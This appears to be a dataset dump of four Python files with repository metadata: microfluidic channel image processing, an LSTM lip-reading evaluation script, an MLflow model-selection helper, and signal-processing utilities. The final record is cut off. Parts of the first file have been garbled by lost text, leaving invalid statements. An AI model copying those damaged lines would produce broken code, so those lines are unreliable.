+{"seq_id": "2598726206", "text": "# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Mar 17 10:26:20 2017\n\n@author: quentinpeter\n\"\"\"\nimport numpy as np\nimport background_rm as rmbg\nimport image_registration.image as ir\nimport image_registration.channel as cr\nimport diffusion_device.profile as dp\nimport scipy\nimport matplotlib.image as mpimg\nimport warnings\nimport cv2\nfrom scipy import interpolate\nwarnings.filterwarnings('ignore', 'Mean of empty slice',RuntimeWarning)\n\ndef size_images(images,Q,Wz,pixsize,readingpos=None,Rs=None,chanWidth=300e-6,*,\n Zgrid=11,ignore=10e-6,normalize_profiles=True,initmode='none',\n data_dict=None,rebin=2,):\n \"\"\"\n Get the hydrodynamic radius from the images\n \n Parameters\n ----------\n images: 1d list of images or file name OR 2x 1d list\n If this is a string, it will be treated like a path\n If one list, treated like regular fluorescence images\n If two list, treated like images and backgrounds\n Q: float\n Flow rate in [ul/h]\n Wz: float\n Height of the channel in [m]\n pixsize: float\n Pixel size in [m]\n readingpos: 1d float array, defaults None\n Position at which the images are taken. If None, take the defaults\n Rs: 1d array, defaults None\n Hydrodimamic radii to simulate in [m].\n If None: between .5 and 10 nm\n chanWidth: float, default 300e-6\n The channel width in [m]\n Zgrid: int, defaults 11\n Number of Z slices\n ignore: float, defaults 10e-6\n Distance to sides to ignore\n normalize_profiles: Bool, defaults True\n Should the profiles be normalized?\n initmode: str, defaults 'none'\n The processing mode for the initial profile (See profiles.py)\n data_dict: dict, defaults None\n Output to get the profiles and fits\n rebin: int, defaults 2\n Rebin factor to speed up code\n \n Returns\n -------\n r: float\n Radius in [m]\n \n \"\"\"\n \n #Check images is numpy array\n images=np.asarray(images)\n \n #Fill missing arguments\n if readingpos is None:\n readingpos=defaultReading12Pos()\n if Rs is None:\n Rs=np.arange(.5,10,.5)*1e-9\n \n #load images if string\n if images.dtype.type==np.str_:\n if len(np.shape(images))==1:\n images=np.asarray(\n [mpimg.imread(im) for im in images])\n elif len(np.shape(images))==2:\n images=np.asarray(\n [[mpimg.imread(im) for im in ims] for ims in images])\n #Get flat images\n if len(np.shape(images))==3:\n #Single images\n flatimages=np.asarray(\n [flat_image(im,pixsize, chanWidth) \n for im in images])\n elif len(np.shape(images))==4 and np.shape(images)[0]==2:\n #images and background\n flatimages=np.asarray(\n [remove_bg(im,bg,pixsize, chanWidth) \n for im,bg in zip(images[0],images[1])])\n \n if rebin>1: \n size=tuple(np.array(np.shape(flatimages)[1:])//rebin)\n flatimages=np.array([cv2.resize(im,size,interpolation=cv2.INTER_AREA)\n for im in flatimages])\n pixsize*=rebin \n \n #get profiles\n profiles=np.asarray(\n [extract_profile(fim,pixsize, chanWidth) for fim in flatimages])\n \n if data_dict is not None:\n data_dict['pixsize']=pixsize\n data_dict['profiles']=profiles \n\n return dp.size_profiles(profiles,Q,Wz,pixsize,readingpos,Rs,\n initmode=initmode,normalize_profiles=normalize_profiles,\n Zgrid=Zgrid, ignore=ignore,data_dict=data_dict)\n \n\ndef remove_bg(im,bg, pixsize, chanWidth=300e-6):\n \"\"\"\n Remove background from image\n \n Parameters\n ----------\n im: 2d array\n image \n bg: 2d array\n background\n pixsize: float\n pixel size in [m]\n chanWidth: float, defaults 300e-6\n channel width in [m]\n \n Returns\n -------\n im: 2d array\n The processed image\n \n \"\"\"\n im=np.array(im,dtype=float)\n bg=np.array(bg,dtype=float)\n #remove dust peaks on images\n bg[rmbg.getPeaks(bg, maxsize=50*50)]=np.nan\n im[rmbg.getPeaks(im, maxsize=50*50)]=np.nan \n \n #Get the X positions (perpendicular to alignent axis) and check wide enough\n X=np.arange(im.shape[1])*pixsize\n assert(1.2*chanWidth.55*chanWidth,np.isfinite(prof))\n \n if reflatten:\n #fit ignoring extreme 10 pix\n fit=np.polyfit(X[out][ignore:-ignore],prof[out][ignore:-ignore],2)\n bgfit=fit[0]*X**2+fit[1]*X+fit[2]\n \n #Flatten the profile\n prof=(prof+1)/(bgfit+1)-1\n\n #We restrict the profile to channel width - widthcut\n Npix=int(chanWidth//pixsize)+1\n \n Xc=np.arange(Npix)-(Npix-1)/2\n Xc*=pixsize\n \n finterp=interpolate.interp1d(X, prof,bounds_error=False,fill_value=0)\n \"\"\"\n from matplotlib.pyplot import figure, imshow,plot\n figure()\n plot(X,prof)\n #\"\"\" \n return finterp(Xc)\n \n \n \"\"\"\n from matplotlib.pyplot import figure, imshow,plot\n figure()\n imshow(flatim)\n plot([c-Npix//2,c-Npix//2],[5,np.shape(flatim)[0]-5],'r')\n plot([c+Npix//2,c+Npix//2],[5,np.shape(flatim)[0]-5],'r')\n figure()\n pr=np.nanmean(flatim,0)\n plot(pr)\n plot([c-Npix//2,c-Npix//2],[np.nanmin(pr),np.nanmax(pr)],'r')\n plot([c+Npix//2,c+Npix//2],[np.nanmin(pr),np.nanmax(pr)],'r')\n #\"\"\" \n \n# return prof[channel]\n \ndef defaultReading12Pos():\n '''\n Get the default reading positions for the 12 points diffusion device\n \n Returns\n -------\n readingPos: 1d array\n The reading positions\n '''\n return np.array([0,\n 3.5,\n 5.3,\n 8.6,\n 10.3,\n 18.6,\n 20.4,\n 28.6,\n 30.4,\n 58.7,\n 60.5,\n 88.7,\n 90.5])*1e-3 \n \ndef outChannelMask(im, chAngle=0):\n \"\"\"Creates a mask that excludes the channel\n \n Parameters\n ----------\n im: 2d array\n The image\n chAngle: number\n The angle of the channel in radians\n \n Returns\n -------\n mask: 2d array\n the mask excluding the channel\n \n Notes\n -----\n The channel should be clear(ish) on the image. \n The angle should be aligned with the channel\n \n\n \"\"\"\n im=np.array(im,dtype='float32')\n #Remove clear dust\n mask=rmbg.backgroundMask(im, nstd=6)\n im[~mask]=np.nan\n \n #get edge\n scharr=cr.Scharr_edge(im)\n #Orientate image along x if not done\n if chAngle !=0:\n scharr= ir.rotate_scale(scharr, -chAngle,1,np.nan)\n \n #get profile\n prof=np.nanmean(scharr,1)\n #get threshold\n threshold=np.nanmean(prof)+3*np.nanstd(prof)\n mprof=prof>threshold\n edgeargs=np.flatnonzero(mprof)\n \n if edgeargs.size > 2:\n mask=np.zeros(im.shape)\n mask[edgeargs[0]-5:edgeargs[-1]+5,:]=2\n if chAngle !=0:\n mask= ir.rotate_scale(mask, chAngle,1,np.nan)\n mask=np.logical_and(mask<1, np.isfinite(im))\n else:\n mask= None\n return mask\n \ndef outGaussianBeamMask(data, chAngle=0):\n \"\"\"\n get the outside of the channel from a gaussian fit\n \n Parameters\n ----------\n data: 2d array\n The image\n chAngle: number\n The angle of the channel in radians\n \n Returns\n -------\n mask: 2d array\n the mask excluding the channel\n \n \"\"\"\n data=np.asarray(data)\n \n #Filter to be used\n gfilter=scipy.ndimage.filters.gaussian_filter1d\n \n #get profile\n if chAngle!=0:\n data=ir.rotate_scale(data, -chAngle,1,np.nan)\n profile=np.nanmean(data,1)\n \n #guess position of max\n amax= profile.size//2\n \n #get X and Y\n X0=np.arange(profile.size)-amax\n Y0=profile\n \n #The cutting values are when the profiles goes below zero\n rlim=np.flatnonzero(np.logical_and(Y0<0,X0>0))[0]\n llim=np.flatnonzero(np.logical_and(Y0<0,X0<0))[-1]\n \n #We can now detect the true center\n fil=gfilter(profile,21)\n X0=X0-X0[np.nanargmax(fil[llim:rlim])]-llim\n \n #restrict to the correct limits\n X=X0[llim:rlim]\n Y=Y0[llim:rlim]-np.nanmin(Y0)\n \n #Fit the log, which should be a parabola\n c=np.polyfit(X,np.log(Y),2)\n \n #Deduce the variance\n var=-1/(2*c[0])\n \n #compute the limits (3std, restricted to half the image)\n mean=np.nanargmax(fil[llim:rlim])+llim\n dist=int(3*np.sqrt(var))\n if dist > profile.size//4:\n dist = profile.size//4\n llim=mean-dist\n if llim < 0:\n return None\n rlim=mean+dist\n if rlim>profile.size:\n return None\n \n #get mask\n mask=np.ones(data.shape)\n \n if chAngle!=0:\n idx=np.indices(mask.shape)\n \n \n idx[1]-=mask.shape[1]//2\n idx[0]-=mask.shape[0]//2\n X=np.cos(chAngle)*idx[1]+np.sin(chAngle)*idx[0]\n Y=np.cos(chAngle)*idx[0]-np.sin(chAngle)*idx[1]\n \n mask[np.abs(Y-mean+mask.shape[0]//2).5, np.isfinite(data))\n mask=mask>.5\n return mask\n \n \"\"\"\n import matplotlib.pyplot as plt\n plt.figure()\n #plot profile and fit\n valmax=np.nanmax(Y)\n plt.plot(X0,Y0)\n plt.plot(X0,valmax*np.exp(-(X0**2)/(2*var))+np.nanmin(Y0))\n plt.plot([llim-mean,llim-mean],[np.nanmin(Y0),np.nanmax(Y0)],'r')\n plt.plot([rlim-mean,rlim-mean],[np.nanmin(Y0),np.nanmax(Y0)],'r')\n #\"\"\"\n\n", "repo_name": "impact27/diffusionalSizing", "sub_path": "lib/diffusion_device/channel_image.py", "file_name": "channel_image.py", "file_ext": "py", "file_size_in_byte": 12119, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "32", "api": [{"api_name": "warnings.filterwarnings", "line_number": 17, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 65, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 71, "usage_type": "call"}, {"api_name": "numpy.str_", "line_number": 74, "usage_type": "attribute"}, {"api_name": "numpy.shape", "line_number": 75, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 76, "usage_type": "call"}, {"api_name": "matplotlib.image.imread", "line_number": 77, "usage_type": "call"}, {"api_name": "matplotlib.image", "line_number": 77, "usage_type": "name"}, {"api_name": "numpy.shape", "line_number": 78, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 79, "usage_type": "call"}, {"api_name": "matplotlib.image.imread", "line_number": 80, "usage_type": "call"}, {"api_name": "matplotlib.image", "line_number": 80, "usage_type": "name"}, {"api_name": "numpy.shape", "line_number": 82, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 84, "usage_type": "call"}, {"api_name": "numpy.shape", "line_number": 87, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 89, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 94, "usage_type": "call"}, {"api_name": "numpy.shape", "line_number": 94, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 95, "usage_type": "call"}, {"api_name": "cv2.resize", "line_number": 95, "usage_type": "call"}, {"api_name": "cv2.INTER_AREA", "line_number": 95, "usage_type": "attribute"}, {"api_name": "numpy.asarray", "line_number": 100, "usage_type": "call"}, {"api_name": "diffusion_device.profile.size_profiles", "line_number": 107, "usage_type": "call"}, {"api_name": "diffusion_device.profile", "line_number": 107, "usage_type": "name"}, {"api_name": "numpy.array", "line_number": 133, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 134, "usage_type": "call"}, {"api_name": "background_rm.getPeaks", "line_number": 136, "usage_type": "call"}, {"api_name": "numpy.nan", "line_number": 136, "usage_type": "attribute"}, {"api_name": "background_rm.getPeaks", "line_number": 137, "usage_type": "call"}, {"api_name": "numpy.nan", "line_number": 137, "usage_type": "attribute"}, {"api_name": "numpy.arange", "line_number": 140, "usage_type": "call"}, {"api_name": "numpy.absolute", "line_number": 144, "usage_type": "call"}, {"api_name": "numpy.ones", "line_number": 147, "usage_type": "call"}, {"api_name": "background_rm.remove_curve_background", "line_number": 151, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 172, "usage_type": "call"}, {"api_name": "background_rm.getPeaks", "line_number": 174, "usage_type": "call"}, {"api_name": "numpy.nan", "line_number": 174, "usage_type": "attribute"}, {"api_name": "diffusion_device.profile.image_angle", "line_number": 176, "usage_type": "call"}, {"api_name": "diffusion_device.profile", "line_number": 176, "usage_type": "name"}, {"api_name": "numpy.nanmedian", "line_number": 176, "usage_type": "call"}, {"api_name": "image_registration.image.rotate_scale", "line_number": 177, "usage_type": "call"}, {"api_name": "image_registration.image", "line_number": 177, "usage_type": "name"}, {"api_name": "numpy.nan", "line_number": 177, "usage_type": "attribute"}, {"api_name": "numpy.nanmean", "line_number": 180, "usage_type": "call"}, {"api_name": "numpy.nanmedian", "line_number": 181, "usage_type": "call"}, {"api_name": "numpy.isnan", "line_number": 182, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 183, "usage_type": "call"}, {"api_name": "diffusion_device.profile.center", "line_number": 183, "usage_type": "call"}, {"api_name": "diffusion_device.profile", "line_number": 183, "usage_type": "name"}, {"api_name": "numpy.abs", "line_number": 187, "usage_type": "call"}, {"api_name": "numpy.ones", "line_number": 188, "usage_type": "call"}, {"api_name": "numpy.shape", "line_number": 188, "usage_type": "call"}, {"api_name": "background_rm.polyfit2d", "line_number": 192, "usage_type": "call"}, {"api_name": "image_registration.image.rotate_scale", "line_number": 229, "usage_type": "call"}, {"api_name": "image_registration.image", "line_number": 229, "usage_type": "name"}, {"api_name": "diffusion_device.profile.image_angle", "line_number": 229, "usage_type": "call"}, {"api_name": "diffusion_device.profile", "line_number": 229, "usage_type": "name"}, {"api_name": "numpy.nan", "line_number": 230, "usage_type": "attribute"}, {"api_name": "numpy.nanmean", "line_number": 232, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 235, "usage_type": "call"}, {"api_name": "diffusion_device.profile.center", "line_number": 236, "usage_type": "call"}, {"api_name": "diffusion_device.profile", "line_number": 236, "usage_type": "name"}, {"api_name": "numpy.abs", "line_number": 237, "usage_type": "call"}, {"api_name": "diffusion_device.profile.center", "line_number": 238, "usage_type": "call"}, {"api_name": "diffusion_device.profile", "line_number": 238, "usage_type": "name"}, {"api_name": "numpy.argmax", "line_number": 238, "usage_type": "call"}, {"api_name": "numpy.logical_and", "line_number": 241, "usage_type": "call"}, {"api_name": "numpy.abs", "line_number": 241, "usage_type": "call"}, {"api_name": "numpy.isfinite", "line_number": 241, "usage_type": "call"}, {"api_name": "numpy.polyfit", "line_number": 245, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 254, "usage_type": "call"}, {"api_name": "scipy.interpolate.interp1d", "line_number": 257, "usage_type": "call"}, {"api_name": "scipy.interpolate", "line_number": 257, "usage_type": "name"}, {"api_name": "numpy.array", "line_number": 290, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 326, "usage_type": "call"}, {"api_name": "background_rm.backgroundMask", "line_number": 328, "usage_type": "call"}, {"api_name": "numpy.nan", "line_number": 329, "usage_type": "attribute"}, {"api_name": "image_registration.channel.Scharr_edge", "line_number": 332, "usage_type": "call"}, {"api_name": "image_registration.channel", "line_number": 332, "usage_type": "name"}, {"api_name": "image_registration.image.rotate_scale", "line_number": 335, "usage_type": "call"}, {"api_name": "image_registration.image", "line_number": 335, "usage_type": "name"}, {"api_name": "numpy.nan", "line_number": 335, "usage_type": "attribute"}, {"api_name": "numpy.nanmean", "line_number": 338, "usage_type": "call"}, {"api_name": "numpy.nanmean", "line_number": 340, "usage_type": "call"}, {"api_name": "numpy.nanstd", "line_number": 340, "usage_type": "call"}, {"api_name": "numpy.flatnonzero", "line_number": 342, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 345, "usage_type": "call"}, {"api_name": "image_registration.image.rotate_scale", "line_number": 348, "usage_type": "call"}, {"api_name": "image_registration.image", "line_number": 348, "usage_type": "name"}, {"api_name": "numpy.nan", "line_number": 348, "usage_type": "attribute"}, {"api_name": "numpy.logical_and", "line_number": 349, "usage_type": "call"}, {"api_name": "numpy.isfinite", "line_number": 349, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 371, "usage_type": "call"}, {"api_name": "scipy.ndimage", "line_number": 374, "usage_type": "attribute"}, {"api_name": "image_registration.image.rotate_scale", "line_number": 378, "usage_type": "call"}, {"api_name": "image_registration.image", "line_number": 378, "usage_type": "name"}, {"api_name": "numpy.nan", "line_number": 378, "usage_type": "attribute"}, {"api_name": "numpy.nanmean", "line_number": 379, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 385, "usage_type": "call"}, {"api_name": "numpy.flatnonzero", "line_number": 389, "usage_type": "call"}, {"api_name": "numpy.logical_and", "line_number": 389, "usage_type": "call"}, {"api_name": "numpy.flatnonzero", "line_number": 390, "usage_type": "call"}, {"api_name": "numpy.logical_and", "line_number": 390, "usage_type": "call"}, {"api_name": "numpy.nanargmax", "line_number": 394, "usage_type": "call"}, {"api_name": "numpy.nanmin", "line_number": 398, "usage_type": "call"}, {"api_name": "numpy.polyfit", "line_number": 401, "usage_type": "call"}, {"api_name": "numpy.log", "line_number": 401, "usage_type": "call"}, {"api_name": "numpy.nanargmax", "line_number": 407, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 408, "usage_type": "call"}, {"api_name": "numpy.ones", "line_number": 419, "usage_type": "call"}, {"api_name": "numpy.indices", "line_number": 422, "usage_type": "call"}, {"api_name": "numpy.cos", "line_number": 427, "usage_type": "call"}, {"api_name": "numpy.sin", "line_number": 427, "usage_type": "call"}, {"api_name": "numpy.cos", "line_number": 428, "usage_type": "call"}, {"api_name": "numpy.sin", "line_number": 428, "usage_type": "call"}, {"api_name": "numpy.abs", "line_number": 430, "usage_type": "call"}]}
+{"seq_id": "18424587", "text": "# used below link for vgg16 as feature extractor\n# https://www.kaggle.com/carloalbertobarbano/vgg16-transfer-learning-pytorch\n# https://stackoverflow.com/questions/45022734/understanding-a-simple-lstm-pytorch\nimport torch.optim as optim\nfrom torch.utils.data import Dataset\nfrom torch.utils.data import DataLoader\nfrom torch import nn\nimport torchvision.models as models\nimport numpy as np\nimport pickle as pkl\nimport torch\nimport os\nfrom sklearn.metrics import accuracy_score, precision_score, recall_score\nfrom utils import PlotConfusionMatrix, PlotLoss, PlotAccuracy\n\nDATA_DIR_ROOT = \"../data/MIRACL_VC1/\"\nRESULTS_DIR_ROOT = \"../results/\"\nTEST_DATA = \"test_resnet50_feats_SEEN.pkl\"\n\nBATCH_SIZE = 16\nTIME_STEPS = 5\nN_CLASS = 10\n\nclass MIRACL_VC1_FEAT(Dataset):\n\tdef __init__(self,data):\n\t\tself.X = data['feats']\n\t\tself.Y = data['labels']\n\n\tdef __len__(self):\n\t\treturn len(self.X)\n\n\tdef __getitem__(self,idx):\n\t\treturn [self.X[idx], self.Y[idx]]\n\ndef get_data(path):\n\twith open(path,'rb') as f:\n\t\tdata = pkl.load(f)\n\tprint(\"DATA Instances : \",len(data['labels']))\n\tdataset = MIRACL_VC1_FEAT(data)\n\treturn dataset\n\nclass TOP_LSTM(nn.Module):\n\tdef __init__(self):\n\t\tsuper().__init__()\n\t\tself.feat_dim = 2048\n\n\t\tself.lstm1 = nn.LSTM(input_size = self.feat_dim, hidden_size = 1, bidirectional = True)\n\t\tself.processOut = nn.Linear(TIME_STEPS*2,N_CLASS)\n\t\tself.classifier = nn.Softmax()\n\n\tdef forward(self,input):\n\t\tout,_ = self.lstm1(input.reshape(TIME_STEPS,BATCH_SIZE,self.feat_dim))\n\t\tout = out.permute(1,0,2)\n\t\tout = torch.flatten(out,1)\n\t\tscores = self.processOut(out)\n\t\tlabels = self.classifier(scores).argmax(axis=1)\n\t\treturn scores,labels\n\nprint(\"load model\")\nmodel = TOP_LSTM()\nmodel.load_state_dict(torch.load(RESULTS_DIR_ROOT+\"resnet50_checkpoint_lstm_SEEN.p\"))\n\ntest_dataset = get_data(DATA_DIR_ROOT + TEST_DATA)\ntest_data_dl = DataLoader(test_dataset, batch_size = BATCH_SIZE * TIME_STEPS, drop_last=True)\n\ntest_accuracy_trace = []\ncriterion = nn.CrossEntropyLoss()\nprint(\"Start testing\")\nmodel.eval()\ntest_loss = 0\ntest_words_pred = []\ntest_words_true = []\nfor i,(feats,labels) in enumerate(test_data_dl):\n\tscores,pred_labels = model(feats)\n\ttrue_labels = labels.reshape(TIME_STEPS,BATCH_SIZE)[-1,:]\n\tloss = criterion(scores,true_labels)\n\ttest_loss+=loss.item()\n\n\ttest_words_true = test_words_true + true_labels.tolist()\n\ttest_words_pred = test_words_pred + pred_labels.tolist()\n\ntest_acc = accuracy_score(test_words_true,test_words_pred)\nprint(\"prediction_loss = \",test_loss/i)\nprint(\"prediction accuracy_score = \", test_acc)\nprint(\"\\n\")\n\nPlotConfusionMatrix(test_words_true,test_words_pred,np.arange(N_CLASS),\"pred_conf_mat.jpg\",title = \"pred confusion matrix\")\n", "repo_name": "SkinnP1/CS763-ComputerVision", "sub_path": "Project/code/predict.py", "file_name": "predict.py", "file_ext": "py", "file_size_in_byte": 2675, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "32", "api": [{"api_name": "torch.utils.data.Dataset", "line_number": 24, "usage_type": "name"}, {"api_name": "pickle.load", "line_number": 37, "usage_type": "call"}, {"api_name": "torch.nn.Module", "line_number": 42, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 42, "usage_type": "name"}, {"api_name": "torch.nn.LSTM", "line_number": 47, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 47, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 48, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 48, "usage_type": "name"}, {"api_name": "torch.nn.Softmax", "line_number": 49, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 49, "usage_type": "name"}, {"api_name": "torch.flatten", "line_number": 54, "usage_type": "call"}, {"api_name": "torch.load", "line_number": 61, "usage_type": "call"}, {"api_name": "torch.utils.data.DataLoader", "line_number": 64, "usage_type": "call"}, {"api_name": "torch.nn.CrossEntropyLoss", "line_number": 67, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 67, "usage_type": "name"}, {"api_name": "sklearn.metrics.accuracy_score", "line_number": 82, "usage_type": "call"}, {"api_name": "utils.PlotConfusionMatrix", "line_number": 87, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 87, "usage_type": "call"}]}
+{"seq_id": "21289612953", "text": "\"\"\"\ncode for SKlearn cross validation\n\"\"\"\n\nfrom sklearn.linear_model import LogisticRegression, LinearRegression, Ridge, Lasso\nfrom sklearn.tree import DecisionTreeRegressor\nfrom sklearn.ensemble import RandomForestRegressor\nimport xgboost as xgb\nfrom sklearn.metrics import mean_absolute_error\nfrom sklearn.model_selection import GridSearchCV\n# import mlflow.sklearn\n# from mlflow.models.signature import infer_signature\nimport tensorflow as tf\nfrom tensorflow.keras import layers\nfrom tensorflow.keras import losses\n\n\nimport mlflow\n\n\n\n\n# train on subset of data and find best hyperparameters. then train a model using all the data on those\n# parameters.return that as best model\n\ndef get_sk_learn_best_model(X_train, y_train, specs, method, learners):\n\n # from sklearn.linear_model import LogisticRegression, LinearRegression, Ridge, Lasso\n # from sklearn.tree import DecisionTreeRegressor\n # from sklearn.ensemble import RandomForestRegressor\n # import xgboost as xgb\n # from sklearn.metrics import mean_absolute_error\n # from sklearn.model_selection import GridSearchCV\n\n with mlflow.start_run() as run:#run_id=\"Linear_Regression\"\n mlflow.autolog()\n \n # lr = LinearRegression()\n # regressor = specs['methods'][method]['learner']\n regressor = learners[method]\n param_grid = specs['methods'][method]['param_grid']\n clf_gs = GridSearchCV(regressor, param_grid=param_grid, scoring='neg_median_absolute_error', n_jobs=10, verbose=2)\n clf_gs.fit(X_train, y_train)\n print(run.info.run_id, clf_gs.best_params_)\n \n return(clf_gs.best_estimator_, run.info.run_id)\n\ndef get_keras_01_best_model(X_train, y_train, specs, method, learners):\n\n # import tensorflow as tf\n # from tensorflow.keras import layers\n # from tensorflow.keras import losses\n\n input_size = X_train.shape[1]\n model = tf.keras.Sequential([\n layers.Dense(2*input_size, activation='relu', input_shape=(input_size,)),\n layers.Dense(20, activation='relu'),\n layers.Dense(1)\n ])\n\n model.compile(loss=tf.keras.losses.MeanAbsoluteError())#, metrics=[tf.keras.metrics.Recall()])\n with mlflow.start_run() as run:#run_id=\"Linear_Regression\"\n mlflow.autolog()\n model.fit(X_train, y_train, epochs=10)#, validation_split=0.2)\n \n return(model, run.info.run_id)\n\n\n#add tags for mlfow tracking server\n# some way to multiprocess decsion trees\n\ndef get_best_model(X_train, y_train, specs, method, learners):\n print(\"method: \", method)\n\n #choose best model function based on on method i.e. if method in [list of ]\n fit_function = specs['methods'][method]['fit-function']\n \n #fit functions\n # sk_learn_methods = ['Linear Regression', 'Lasso Regression', 'Ridge Regression','XG Boost Regression']\n # keras_methods = []\n\n\n if fit_function == \"scikit learn\":\n print(\"fit-function\", fit_function, \"\\n\\n\")\n return get_sk_learn_best_model(X_train, y_train, specs, method, learners) \n elif fit_function == \"keras 01\":\n print(\"fit-function\", fit_function)\n return get_keras_01_best_model(X_train, y_train, specs, method, learners) \n\n ", "repo_name": "kaiomurz/mlflow-framework", "sub_path": "get_best_model.py", "file_name": "get_best_model.py", "file_ext": "py", "file_size_in_byte": 3185, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "32", "api": [{"api_name": "mlflow.start_run", "line_number": 35, "usage_type": "call"}, {"api_name": "mlflow.autolog", "line_number": 36, "usage_type": "call"}, {"api_name": "sklearn.model_selection.GridSearchCV", "line_number": 42, "usage_type": "call"}, {"api_name": "tensorflow.keras.Sequential", "line_number": 55, "usage_type": "call"}, {"api_name": "tensorflow.keras", "line_number": 55, "usage_type": "attribute"}, {"api_name": "tensorflow.keras.layers.Dense", "line_number": 56, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers", "line_number": 56, "usage_type": "name"}, {"api_name": "tensorflow.keras.layers.Dense", "line_number": 57, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers", "line_number": 57, "usage_type": "name"}, {"api_name": "tensorflow.keras.layers.Dense", "line_number": 58, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers", "line_number": 58, "usage_type": "name"}, {"api_name": "tensorflow.keras.losses.MeanAbsoluteError", "line_number": 61, "usage_type": "call"}, {"api_name": "tensorflow.keras", "line_number": 61, "usage_type": "attribute"}, {"api_name": "mlflow.start_run", "line_number": 62, "usage_type": "call"}, {"api_name": "mlflow.autolog", "line_number": 63, "usage_type": "call"}]}
+{"seq_id": "8950698531", "text": "import numpy as np\r\nimport torch\r\nfrom numba import jit, prange\r\nimport matplotlib.pyplot as plt\r\n\r\ndef plot_signals(signals, samples=None, start=0, title=None):\r\n for name, s in signals.items():\r\n if samples is None:\r\n x_labels = np.linspace(0, s.shape[0], s.shape[0])\r\n plt.plot(x_labels, s, label=name)\r\n else:\r\n assert samples + start <= s.shape[0]\r\n x_labels = np.linspace(start, start+samples, samples)\r\n plt.plot(x_labels, s[start:start+samples], label=name)\r\n \r\n if title is not None:\r\n plt.title(title)\r\n plt.legend()\r\n plt.show()\r\n return None\r\n\r\n@jit(nopython=True, cache=True, parallel=True)\r\ndef pre_emphasis(signal, coefficient = 0.95):\r\n return np.append(signal[0],signal[1:] - coefficient*signal[:-1])\r\n\r\n@jit(nopython=True, cache=True)\r\ndef is_power_of_2(num):\r\n return (num & (num-1) == 0) and num != 0\r\n\r\ndef smallest_greater_pow2(num):\r\n return 1<<(num-1).bit_length()\r\n\r\ndef make_frames(x, frame_length, hop_length):\r\n num_frames = 1 + int(np.ceil((x.size(0) - frame_length) / hop_length))\r\n indices = np.tile(np.arange(0, frame_length), (num_frames, 1)) + np.tile(np.arange(0, num_frames*hop_length, hop_length), (frame_length, 1)).T\r\n indices = np.array(indices, dtype=np.int32)\r\n\r\n # slice signal into frames\r\n frames = x[indices.T]\r\n return frames\r\n\r\n@torch.jit.script\r\ndef torch_MAD(x):\r\n x = x.abs()\r\n return torch.median(torch.abs(x - torch.median(x)))\r\n\r\n@torch.jit.script\r\ndef find_closest(a, v):\r\n '''\r\n Equivalent to argmin(abs(a[i, j] - v)) for all i, j; a is 2D, v is 1D.\r\n Credit: Divakar -- https://stackoverflow.com/a/64526158/10133797\r\n '''\r\n sidx = v.argsort()\r\n v_s = v[sidx]\r\n idx = torch.searchsorted(v_s, a)\r\n idx[idx == len(v)] = len(v) - 1\r\n idx0 = (idx-1).clip(min=0)\r\n\r\n m = torch.abs(a - v_s[idx]) >= torch.abs(v_s[idx0] - a)\r\n m[idx == 0] = 0\r\n idx[m] -= 1\r\n out = sidx[idx]\r\n return out\r\n\r\ndef indexed_sum(a, k):\r\n '''\r\n Sum `a` into rows of 2D array according to indices given by 2D `k`.\r\n '''\r\n out = np.zeros(a.shape, dtype=a.dtype)\r\n _parallel_indexed_sum(a, k, out)\r\n return out\r\n@jit(nopython=True, cache=True, parallel=True)\r\ndef _parallel_indexed_sum(a, k, out):\r\n for j in prange(a.shape[1]):\r\n for i in prange(a.shape[0]):\r\n out[k[i, j], j] += a[i, j]", "repo_name": "YinPing-Cho/Simple-Synchrosqueezing", "sub_path": "utils.py", "file_name": "utils.py", "file_ext": "py", "file_size_in_byte": 2419, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "32", "api": [{"api_name": "numpy.linspace", "line_number": 9, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 10, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 10, "usage_type": "name"}, {"api_name": "numpy.linspace", "line_number": 13, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 14, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 14, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 17, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 17, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 18, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 18, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 19, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 19, "usage_type": "name"}, {"api_name": "numpy.append", "line_number": 24, "usage_type": "call"}, {"api_name": "numba.jit", 